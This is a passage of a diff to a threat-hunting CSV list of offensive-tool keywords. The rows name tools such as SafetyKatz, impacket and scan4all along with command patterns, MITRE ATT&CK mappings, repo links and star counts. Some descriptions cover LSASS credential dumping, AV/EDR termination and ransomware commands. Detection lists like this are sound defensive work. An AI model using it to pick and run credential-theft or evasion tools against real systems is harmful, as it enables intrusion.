-"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SafetyKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
 "*SafetyKatz.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*SafetyKatz.sln*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
 "*safetykatz.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
@@ -16132,7 +16314,7 @@
 "*Salsa-tools*","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","564","140","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z"
 "*sam_the_admin.py*","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z"
 "*SamAdduser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
-"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*sambaPipe.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*samdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
 "*samdump.py*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
 "*samdump.zip*","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z"
@@ -16141,94 +16323,94 @@ "*samdump2.c*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*sample_brc4.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*samr_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework 
and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*samratashok/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*samrdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*sandboxevasion.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" "*SAP_GW_RCE_exploit*","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","145","48","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z" -"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sap2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*SauronEye.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sc create plumber*warpzoneclient*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*sc create Terminator *.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sc_inject_direct.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc_inject_indirect.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc0tfree*","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 
- TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - 
T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome 
BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 
- T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - 
